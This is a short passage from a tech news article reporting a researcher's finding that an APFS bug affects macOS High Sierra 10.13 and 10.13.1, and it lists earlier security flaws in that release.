Edwards tested and found the bug affects only macOS 10.13 and 10.13.1, while later versions of macOS High Sierra (including the latest one) have somehow reportedly fixed this loophole.
For more technical details of this bug, you can head on to the original blog post by Edwards.
This issue is the third APFS bug in past six months affecting Apple's latest macOS High Sierra version.
The operating system has seen a number of security issues since its release—from giving away root access to anyone without a password to revealing passwords in plaintext from the password hint feature.